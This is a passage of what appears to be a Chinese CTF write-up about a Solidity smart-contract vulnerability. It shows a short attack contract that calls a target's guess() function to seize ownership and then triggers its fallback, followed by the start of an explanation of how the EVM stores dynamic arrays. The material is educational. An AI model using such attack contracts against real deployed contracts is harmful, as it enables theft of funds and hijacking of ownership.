1234567891011121314151617181920pragma solidity ^0.4.21;contract dvp_attack {address public targetaddr;constructor(address addr) payable{targetaddr = addr;}function balanceOf(address addr) public returns(uint i){i = 0;}function attack(uint256 x,uint256 blockNum){// modity ownertargetaddr.call(bytes4(keccak256("guess(uint256,uint256)",x,blockNum)));// fallbacktargetaddr.call(bytes4(keccak256("a")));}}在题目之后
在题目之后,我们不难发现,整个漏洞的成因与未初始化storage指针非常像,要明白这个漏洞,首先我们需要明白在EVM中对变长变量的定义和储存方式。
array
1uint256[] map;map就是一个uint类型的数组,在storage中,map变量的储存地址计算公式如下
1address(map_data) = sha3(slot)+offset刚才说到array_slot就是数组变量在全局变量中声明的位置,比如map是第二个全局变量
更好更安全的互联网